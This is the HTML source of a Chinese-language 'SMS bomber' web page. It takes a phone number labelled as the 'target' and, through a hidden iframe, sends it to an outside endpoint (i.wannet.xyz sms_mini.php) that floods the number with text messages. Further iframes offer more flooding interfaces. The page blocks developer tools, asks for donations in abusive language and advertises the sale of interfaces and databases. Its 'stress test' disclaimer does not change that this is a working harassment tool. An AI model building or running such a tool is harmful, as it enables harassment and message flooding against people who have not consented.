<!DOCTYPE html>
<meta name="viewport" content="width=device-width">
<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> 
<link rel="shortcut icon" href="https://pan.cccyun.cc/view.php/e3b474df41e48ad7bb098d1d9cf8557e.jpg" />
<html lang="zh_CN">
<head>
<body style="padding:12% 5% 5% 5%;background-image:url(http://api.mtyqx.cn/api/random.php);">
	<script src="https://cdn.bootcdn.net/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
  <script src="https://cdn.jsdelivr.net/gh/fz6m/console-ban@2.2/dist/console-ban.min.js"></script>
  <script>
    ConsoleBan.init()
    ConsoleBan.init({
      redirect: 'http://huaji.icu/error/403.html'
    })
  </script>
        <link rel="stylesheet" type="text/css" href="//lib.baomitu.com/font-awesome/4.7.0/css/font-awesome.min.css">

	<title>李云龙-轰他娘的</title>
	<iframe  frameborder="no" src="./v2.html" width="200" height="80">你的垃圾浏览器不支持，吃屎去吧</iframe>
	<iframe  frameborder="no" src="./v3.html" width="200" height="80">你的垃圾浏览器不支持，吃屎去吧</iframe>
	<iframe  frameborder="no" src="./v4.html" width="200" height="80">你的垃圾浏览器不支持，吃屎去吧</iframe>
	<style type="text/css">
		* {
			padding: 0;
			margin: 0;
		}

		input:nth-of-type(2) {
			width: 60px;
			text-align: center;
			cursor: pointer;
		}
	</style>
	<script src="https://cdn.jsdelivr.net/gh/huaji8/huaji@1.2/index/main.js"></script>
	</head>

	<body>
		<script>alert("草，赞助下行不，5元都没有?(支持微信，支付宝)你妈的再白嫖我tm直接收费\n赞助可获得市政接口一堆和源码以及数据库,广告篇幅，手机电脑全球快速梯子(附带教程)等");
document.addEventListener('visibilitychange', function () { if (document.visibilityState == 'hidden') { normal_title = document.title; document.title = '开炮!!!'; } else { document.title = normal_title; } });</script>
		<font color="white">轰他娘的: </font> <input id="text">
		<input id="submit" value="开炮" onclick="chufa()">
		<iframe id="if" src="" style="display: none;"></iframe>
                 <img src="https://pan.cccyun.cc/view.php/0935290a34b108eff5c96263cf4a5bb6.gif" />
		<br>
		<a href="http://huaji.icu/" target="_blank"><b>作者首页(还有奇怪♂的东西哦)</b></a>
		<br>
		<a href="https://afdian.net/@huaji520"
			target="_blank"><b>赞助作者</b></a>
		<br>
		<p>By:滑稽 本网页完全免费,如果你是买来的或者要钱的,恭喜，你被骗了</p> 感谢<a href="tencent://message/?uin=2024419473" target="_blank"><b>꧁༺猫༒秋༻꧂大佬的帮助！</b></a>
		<br>没错,4号他来了
                 <br>
		<a>页面中3个测压都是不同的接口,免责声明:本网页仅仅供手机短信测压,切勿违法用于违法犯罪，因为违反中国法律及其他国家法律所造成的的后果与作者无关！</a>
		<br>关闭网页即可停止测压,3个同时测压将会造成卡顿(这是真滴),请量力而为。。。音乐因为权限问题第一次需要手动播放，如果播放不了就点点进度条即可
		<br>
</body></html>
<script type="text/javascript">
	function chufa() {
		var a = document.getElementById('text').value;
		var fa = document.getElementById("if");
		if (/^\d+$/.test(a) == true) {
			fa.style = 'width:1px;height:1px;';
			fa.src = 'http://i.wannet.xyz/ms/web/sms_mini.php?hm=' + a + '&ok=';
                        alert("开炮成功，正在轰炸ing.....请等待，想停止请彻底退出网页和浏览器即可");
		}
		else {
			alert("妈的,目标呢！想办法干他一炮");
		}
	}
</script>
<script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script>
<script>LA.init({id: "JHFkcakXSVdcugG1",ck: "JHFkcakXSVdcugG1"})</script>
</head>
<body>
